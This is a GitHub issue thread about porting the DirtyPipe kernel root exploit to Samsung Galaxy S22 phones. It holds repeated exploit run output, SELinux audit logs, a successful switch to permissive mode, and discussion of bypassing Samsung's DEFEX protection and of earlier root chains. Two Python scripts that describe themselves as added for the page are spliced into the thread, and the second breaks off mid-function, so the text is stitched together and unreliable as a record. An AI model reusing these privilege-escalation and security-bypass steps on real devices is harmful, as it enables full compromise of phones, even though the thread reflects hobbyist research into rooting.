polygraphene / DirtyPipe-Android

Dirty Pipe root exploit for Android (Pixel 6)
766 stars 129 forks

S22 #3

Open oakieville opened 2 years ago

oakieville commented 2 years ago

Could this same method work on the S22? I assume it would require mymod.ko to be built from the S22 kernel source, but can it work?

elliwigy commented 2 years ago

Here it is after a reboot, still with beta2.. trying beta3 now.. logcat4.txt

polygraphene commented 2 years ago

No modprobe output on the log. Very strange...

elliwigy commented 2 years ago

dirtypipe-android-1.0.3-beta3.zip

I added more log and setenforce 0 on startup-root. Try it. You don't need to edit startup-root.

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 21.1 MB/s (45296 bytes in 0.002s)
startup-root: 1 file pushed, 0 skipped. 1.5 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 87.2 MB/s (2102536 bytes in 0.023s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 114.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 26.5 MB/s (2821955 bytes in 0.102s)
Failed to set property 'a' to 'a'. See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 9
Stage1 debug filename: /dev/.dirtypipe-0009
Shell code size: 344 0x158 bytes
It worked!
AUTH
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
telnet: can't connect to remote host (127.0.0.1): Connection refused
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> adb shell
b0q:/ $ getenforce
Enforcing
b0q:/ $ exit
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3> .\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 65.5 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 5.6 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 109.9 MB/s (2102536 bytes in 0.018s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 115.6 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 45.0 MB/s (2821955 bytes in 0.060s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 10
Stage1 debug filename: /dev/.dirtypipe-0010
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
PS C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>

logcat5.txt

polygraphene commented 2 years ago

Could you run it in the command prompt? Sometimes PowerShell does bad things.

polygraphene commented 2 years ago

AUTH message is very strange... I have never seen that message.

polygraphene commented 2 years ago

I think I only see the logcat of second attempt of run.bat.

elliwigy commented 2 years ago

C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 29.7 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.3 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 118.0 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 106.9 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 24.7 MB/s (2821955 bytes in 0.109s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>.\run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 34.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 1.7 MB/s (1195 bytes in 0.001s)
magisk/busybox: 1 file pushed, 0 skipped. 116.2 MB/s (2102536 bytes in 0.017s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 112.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 33.7 MB/s (2821955 bytes in 0.080s)
Failed to set property 'a' to 'a'. See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 12
Stage1 debug filename: /dev/.dirtypipe-0012
Shell code size: 344 0x158 bytes
It worked!
id
AUTH
Press any key to continue . . .
C:\Users\sampw\Downloads\dpoc3\dirtypipe-android-1.0.3-beta3>

elliwigy commented 2 years ago

I think I only see the logcat of second attempt of run.bat.

It was twice.. I run logcat, then run.bat, then when it's done and doesn't do anything I run it again and it crashes.. same output.. @oakieville can you try it on your S22?

polygraphene commented 2 years ago

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

polygraphene commented 2 years ago

The second run without a reboot always fails, because after the first run the libs are not restored properly. Can you upload the logcat when it is run only once?

oakieville commented 2 years ago

dirtypipe-android: 1 file pushed, 0 skipped. 58.6 MB/s (45296 bytes in 0.001s)
startup-root: 1 file pushed, 0 skipped. 2.4 MB/s (1195 bytes in 0.000s)
magisk/busybox: 1 file pushed, 0 skipped. 150.3 MB/s (2102536 bytes in 0.013s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 139.8 MB/s (672928 bytes in 0.005s)
4 files pushed, 0 skipped. 1.0 MB/s (2821955 bytes in 2.714s)
Failed to set property 'a' to 'a'. See dmesg for error reason.
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 5
Stage1 debug filename: /dev/.dirtypipe-0005
Shell code size: 344 0x158 bytes
It worked!

beta3 stopped there for me

modprobe-payload: Successfully set permissive in logcat

adb shell getenforce
Enforcing

logcatbeta3.txt

oakieville commented 2 years ago

stat: '/dev/.dirtypipe-0005': Permission denied

polygraphene commented 2 years ago

Thanks. There are similar logs as @elliwigy provides:

03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:246): avc:  denied  { search } for  pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:247): avc:  denied  { execute } for  pid=16958 comm="modprobe" name="startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:248): avc:  denied  { read open } for  pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered

According to this log, the kernel module was successfully loaded and set permissive.

polygraphene commented 2 years ago

Can you run adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848 in another command prompt, leaving the run.bat prompt untouched?

oakieville commented 2 years ago

telnet: can't connect to remote host (127.0.0.1): Connection refused

However, this device is not physically connected to my PC, it is shared remotely.

not sure if that matters

oakieville commented 2 years ago

Seeing permissive in logcat got me excited for a minute. Even with only permissive I believe I can do my main goal.

polygraphene commented 2 years ago

Yep. I think we are nearly at the goal (permissive + root shell).

I built the version to completely set permissive. (getenforce will output Permissive) dirtypipe-android-1.0.3-beta4.zip But perhaps still we can't get root shell.

polygraphene commented 2 years ago

I think we are blocked by some security mechanism by samsung. I will check kernel source after tomorrow.

Thank you for testing for a long time today.

oakieville commented 2 years ago

adb shell getenforce
Permissive

Well look at that.

elliwigy commented 2 years ago

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over the last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8, since we have locked BLs..

That said, I am no expert by any means, but unfortunately there haven't been many devs working on USA/Snap model Samsungs for a while now lol.. Maybe some other devs for other devices can help, there has to be a universal method.. too bad fire30 won't release his methods 🥱

You are a pro in my book and I appreciate your help.. We are so close and I bet it's something simple we are missing.. Is there any other way besides telnet?

One root method back in S8 days that worked (there were a few exploits I daisy-chained) that even chainfire was surprised worked: we had an su binary in system/xbin but couldn't execute it, and one day I was messing around and typed "adb shell setsid su" and sure enough it opened a root shell lol.. Or another time I used uevent_helper and pushed a script there that was executed by the kernel and installed root for me.. Or another, I used a qti_init script on param that was executed by init when setting a prop value via setprop, or even cmdline injection I found that passed properties via the bootloader by changing the serialno lol.. Point is, there has to be something we can use :-)

oakieville commented 2 years ago

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $

Connected, but not root. It is permissive however.

polygraphene commented 2 years ago

If this exploit was blocked by a security mechanism like Samsung RKP, it is very difficult to debug the issue remotely. In addition, I have very little experience with Samsung devices. We might need some help from experienced devs.

lol I do security research for fun and mainly only Samsung devices.. I've reported a number of exploits to Samsung (and was rewarded) over the last few years. In fact, I am pretty much the only one who has found root methods on USA models since the S8, since we have locked BLs..

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So we can modify internal data of DEFEX, I think.

I uploaded the kernel code of the Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root, it is permissive however

How did you launch telnetd? From a normal (non-root) shell? If so, it is expected behavior.

polygraphene commented 2 years ago

Can you run dmesg command on adb shell? Kernel log might help to debug the issue.

oakieville commented 2 years ago

Yes, shortly I'll run it. Unfortunately I don't know DEFEX. I do have the kernel source downloaded.

oakieville commented 2 years ago

adb shell /data/local/tmp/busybox telnet 127.0.0.1 10848
r0q:/ $ connected but not root, it is permissive however

How did you launch telnetd? From a normal (non-root) shell? If so, it is expected behavior.

Yes, normal shell, as no root shell was presented (maybe I did something wrong, but it seems to have run correctly).

elliwigy commented 2 years ago

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So we can modify internal data of DEFEX, I think.

I uploaded the kernel code of the Galaxy S22. https://github.com/polygraphene/SM-S901U_NA_12_Kernel/tree/main/kernel_platform/common

I honestly didn't think they were still using DEFEX, but back on Oreo it was a simple hex patch that bypassed it in the kernel.. Magisk automatically patches it, to my understanding..

Maybe we can use another location the shell has access to, such as

/data/user_de/0/com.android.shell/files

which is the path for /bugreports

It is also where bugreports are created/stored.. Not sure if it's a "safe place" or not by DEFEX standards.. Magisk is sometimes executed from /data/adb, which of course needs privs to access it.

elliwigy commented 2 years ago

Either way, we know it's possible since fire30 was able to get a root shell on P6 and S22 devices.. he uses an app however, so maybe he gets around it somehow by using the app's directory instead of data/local/tmp? Maybe using Termux or something like Andronix to run Linux within Termux can help?

elliwigy commented 2 years ago

That's great! Do you have experience with DEFEX? I have found an explanation of DEFEX. It possibly prevents our startup-root from executing. Any idea on how to disable/bypass DEFEX? We can now execute any code in a kernel module. So we can modify internal data of DEFEX, I think.

Would we use startup-root to edit code, or do we need to build a kernel module to do things?

polygraphene commented 2 years ago

It is possible to (temporarily) bypass DEFEX by utilizing paths other than /data/local/tmp, but ultimately a kernel solution to completely disable DEFEX is inevitable. Given that we already have kernel arbitrary r/w, the solution will be straightforward, like binary patching in the kernel module.

Honestly, I'm not interested in bypassing/disabling DEFEX. Because it is samsung specific and I don't have the device.

Why not learn C language and kernel development to complete the work? @elliwigy

elliwigy commented 2 years ago

I do know some C code and def. know kernel development.. Also, I am not sure DEFEX is the cause, as I haven't seen it referenced anywhere in logs for example. So essentially a root shell would be nice, then I can work on other things, but I simply don't have the time to learn a new language in detail due to my regular job, unfortunately.

elliwigy commented 2 years ago

What are all these things?

b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al
total 2781
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\n\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\n:\ can1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\nnt
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n\ 
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\n]:\ cant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 \r\r\nant
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 \r\r\nt
drwxrwx--x 3 shell shell    3452 2022-03-31 02:36 .
drwxr-x--x 6 root  root     3452 1969-12-31 19:13 ..
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 127
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 :
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [1
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1223]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1239]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1347]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1949]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [196]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [1984]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [201
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2618]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [2998]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [30
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3174]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3384]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3424]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [3790]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4160]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4241]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4244]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4628]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4641
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4771]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4797
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4888]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4964]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [4967]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [49871
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5001]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5052]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5170]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5398]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5421]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5462]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5563]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5759]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [5919]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6288]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6353]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6460]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6464]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6554]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6564]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:06 [6587]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6619]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [6905]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7191]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7403]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [7751
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8293]:
-rw-rw-rw- 1 shell shell       0 2022-03-29 22:07 [8319]:

xcainiao commented 2 years ago

I built mymod.ko with the S22 kernel. It is too large.

du -sh mymod.ko
432K    mymod.ko

polygraphene commented 2 years ago

What are all these things?

b0q:/ $ cd /data/local/tmp
b0q:/data/local/tmp $ ls -al

I have never seen that... Seems like the result of pasting some log output into adb shell. Or a bug of run.bat?

polygraphene commented 2 years ago

I built mymod.ko with the S22 kernel. It is too large.

du -sh mymod.ko
432K    mymod.ko

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

oakieville commented 2 years ago

I think I'm confused about when startup-root is run and by what, because it doesn't seem to run at all. I added a line to echo hello to a file in /data/local/tmp and no file is made. I also removed all code from it and nothing seems to change at all.

polygraphene commented 2 years ago

startup-root is launched here. The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should run in a root + permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

oakieville commented 2 years ago

Ok, I wasn't sure if the issue was due to running it from /data/local/tmp.

oakieville commented 2 years ago

The beta4 here, is the source on the page the same as that, or is it different?

oakieville commented 2 years ago

beta4 gives permissive, however the one compiled from source does not. Not sure if the source is different or there are issues in compiling.

oakieville commented 2 years ago

I also get this when compiling: make: Circular mymod.ko <- mymod.ko dependency dropped.

xcainiao commented 2 years ago

I built mymod.ko with the S22 kernel. It is too large.

du -sh mymod.ko
432K    mymod.ko

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

The file in ./out/(devicename)/dist/mymod.ko is 92k ...

oakieville commented 2 years ago

I didn't build mymod.ko, I use the one that's in the source.

elliwigy commented 2 years ago

I didn't build mymod.ko, I use the one that's in the source.

I think he's asking his own question, as he compiled it but it was too large apparently, so his is different than yours.

elliwigy commented 2 years ago

startup-root is launched here. The modprobe process is running as root and SELinux is already permissive after the line syscall(__NR_finit_module, ...). So startup-root should run in a root + permissive environment. There is no problem on Pixel 6.

I think DEFEX prevents startup-root from launching.

Wouldn't we see DEFEX in the logs though? Pretty sure in the past it would log any violations blocked by DEFEX, similar to SELinux denials..

Also, if it was being blocked, wouldn't it still be able to launch a normal uid reverse shell without root privs?

And the ls -al I showed earlier is what I find in data/local/tmp after running run.bat (and even switched to Linux and ran run.sh) when it says it worked but fails to launch a reverse shell.. might be the reverse-fifo?

elliwigy commented 2 years ago

This isn't from my device, but here is an example of what it would look like in the logs if DEFEX was blocking something:

[ 21.151486] defex: safeplace violation [task=init (/init), child=/root/cbd, uid=0]

elliwigy commented 2 years ago

Could it be that vendor_modprobe doesn't have the capability of launching a shell_data_file in the data/local/tmp dir?

03-29 07:47:12.947  5656  5656 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:265): avc:  denied  { search } for  pid=5658 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:266): avc:  denied  { execute } for  pid=5658 comm="modprobe" name="startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered
03-29 07:47:12.948  1207  1207 E audit   : type=1400 audit(1648565232.943:267): avc:  denied  { read open } for  pid=5658 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=72642 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S908U_12_0001 audit_filtered

oakieville commented 2 years ago

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

elliwigy commented 2 years ago

[ 41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]

Ahh.. there you go then lol. We need to somehow use another dir other than data/local/tmp that isn't a safeplace.
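Three kinds of log came up in this thread and each answers a different question: the avc lines with permissive=1 (polygraphene reads them as "module loaded and set permissive", because a denial logged with permissive=1 is not enforced), the defex "safeplace violation" line in dmesg (which says why startup-root never ran), and the "first instruction" word printed by run.bat, which is a9be7bfd on a fresh run and 14012971 on a repeat run. The triage script below is an added example written for this page, not code from DirtyPipe-Android. The sample lines are constructed from the excerpts posted above, and reading a B-encoded first instruction as "the previous run's hook is still in place" is my assumption, consistent with polygraphene's note that the libs are not restored after the first run.

```python
import re

# Constructed sample input, modelled on the logcat, dmesg and run.bat excerpts
# posted in this thread (shape copied from the thread, not output captured by me).
LOGCAT = """\
03-29 09:01:47.097 16957 16957 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:246): avc:  denied  { search } for  pid=16958 comm="modprobe" name="tmp" dev="dm-14" ino=107 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
03-29 09:01:47.100  1194  1194 E audit   : type=1400 audit(1648569707.097:248): avc:  denied  { read open } for  pid=16958 comm="modprobe" path="/data/local/tmp/startup-root" dev="dm-14" ino=24217 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1 SEPF_SM-S901U_12_0001 audit_filtered
"""
DMESG = """\
[   41.812778] [ T9901] defex: safeplace violation [task=modprobe (/vendor/bin/toolbox), child=/data/local/tmp/startup-root, uid=0]
"""
RUN_OUTPUT = """\
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: 14012971
"""

AVC_RE = re.compile(
    r'avc:\s+(?P<verdict>denied|granted)\s+\{\s*(?P<perms>[^}]+?)\s*\}\s+for\s+'
    r'(?P<fields>.*?)\s+permissive=(?P<permissive>[01])')
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
DEFEX_RE = re.compile(
    r'defex:\s+(?P<kind>\w+)\s+violation\s+\[task=(?P<task>[^\s(]+)\s+\((?P<task_path>[^)]*)\),\s+'
    r'child=(?P<child>[^,\]]+),\s+uid=(?P<uid>\d+)\]')
INSN_RE = re.compile(r'first instruction:\s*([0-9a-fA-F]{8})')


def parse_avc(text):
    """One dict per avc line: verdict, permission list, key=value fields, permissive flag."""
    out = []
    for line in text.splitlines():
        m = AVC_RE.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD_RE.findall(m.group('fields'))}
        out.append({'verdict': m.group('verdict'),
                    'perms': m.group('perms').split(),
                    'permissive': m.group('permissive') == '1',
                    **fields})
    return out


def selinux_mode_for(avc_records, domain):
    """'permissive' if every denial from the domain carried permissive=1 (logged, not enforced),
    'enforcing' if any was enforced, None if the domain never appeared."""
    recs = [r for r in avc_records if r.get('scontext', '').startswith('u:r:%s:' % domain)]
    if not recs:
        return None
    return 'permissive' if all(r['permissive'] for r in recs) else 'enforcing'


def parse_defex(text):
    """DEFEX violation lines from dmesg: kind (e.g. safeplace), task, child path, uid."""
    out = []
    for line in text.splitlines():
        m = DEFEX_RE.search(line)
        if m:
            d = m.groupdict()
            d['uid'] = int(d['uid'])
            out.append(d)
    return out


def classify_first_insn(word):
    """Classify the AArch64 word run.bat reports at the hook site (little-endian value)."""
    if word == 0xd503233f:
        return 'paciasp'                # tool offsets the hook by +4 in this case
    if (word >> 26) == 0b000101:
        return 'branch'                 # unconditional B: assumed leftover hook from an earlier run
    if (word & 0xffc00000) == 0xa9800000:
        return 'stp-pre-index'          # e.g. a9be7bfd = stp x29, x30, [sp, #-0x20]! (untouched prologue)
    return 'other'


def triage(logcat, dmesg, run_output):
    """Summarise what the three logs say about one exploit run."""
    avc = parse_avc(logcat)
    result = {
        'module_set_permissive': 'modprobe-payload: Successfully set permissive' in logcat,
        'vendor_modprobe_mode': selinux_mode_for(avc, 'vendor_modprobe'),
        'startup_root_touched_by_modprobe': any(
            r.get('comm') == 'modprobe' and 'startup-root' in (r.get('path', '') + r.get('name', ''))
            for r in avc),
        'defex_blocked': [d['child'] for d in parse_defex(dmesg) if d['kind'] == 'safeplace'],
        'first_insn': None,
    }
    m = INSN_RE.search(run_output)
    if m:
        result['first_insn'] = classify_first_insn(int(m.group(1), 16))
    return result


if __name__ == '__main__':
    print(triage(LOGCAT, DMESG, RUN_OUTPUT))
```

On the constructed sample this reports the module set permissive, vendor_modprobe running permissive, modprobe reaching startup-root, DEFEX blocking /data/local/tmp/startup-root, and a branch at the hook site, i.e. the state of a repeat run on the S22. Feed it the real files with `triage(open('logcat.txt').read(), open('dmesg.txt').read(), open('run.txt').read())`.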

elliwigy commented 2 years ago

Something like this might work no?

https://github.com/vngkv123/articles/blob/main/Galaxy's%20Meltdown%20-%20Exploiting%20SVE-2020-18610.md#:~:text=DEFEX%20Bypass&text=As%20similar%20to%20the%20way,via%20arbitrary%20kernel%20write%20primitive.

polygraphene commented 2 years ago

I built mymod.ko with the S22 kernel. It is too large.

du -sh mymod.ko
432K    mymod.ko

That is the output before stripping debug info. Check the ./out/(devicename)/dist/mymod.ko file instead.

The file in ./out/(devicename)/dist/mymod.ko is 92k ...

Which section takes the capacity? Compare with the one on repository.
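To answer "which section takes the capacity" for a mymod.ko without needing binutils on the host, here is an added section-size report in Python. It is example code for this page, not part of DirtyPipe-Android or the kernel build. It parses the ELF64 section headers directly, counts only bytes that occupy the file (SHT_NOBITS sections like .bss take none), and flags .debug_* and .rela.debug_* sections, which are what --strip-debug removes. The module built inline by build_sample_elf is a constructed stand-in so the script runs offline; the section names and sizes in it are made up.

```python
import struct

SHT_NOBITS = 8
SHT_PROGBITS = 1
SHT_STRTAB = 3


def elf64_sections(data):
    """[(name, sh_type, sh_size, file_bytes)] for a little-endian ELF64 image."""
    if data[:4] != b'\x7fELF' or data[4] != 2 or data[5] != 1:
        raise ValueError('not a little-endian ELF64 file')
    e_shoff = struct.unpack_from('<Q', data, 40)[0]
    e_shentsize, e_shnum, e_shstrndx = struct.unpack_from('<HHH', data, 58)
    hdrs = []
    for i in range(e_shnum):
        sh_name, sh_type, _flags, _addr, sh_offset, sh_size, _l, _i, _al, _es = \
            struct.unpack_from('<IIQQQQIIQQ', data, e_shoff + i * e_shentsize)
        hdrs.append((sh_name, sh_type, sh_offset, sh_size))
    str_off = hdrs[e_shstrndx][2]           # section name string table

    def name_at(idx):
        return data[str_off + idx:data.index(b'\0', str_off + idx)].decode()

    return [(name_at(n), t, size, 0 if t == SHT_NOBITS else size) for n, t, _o, size in hdrs]


def is_debug_section(name):
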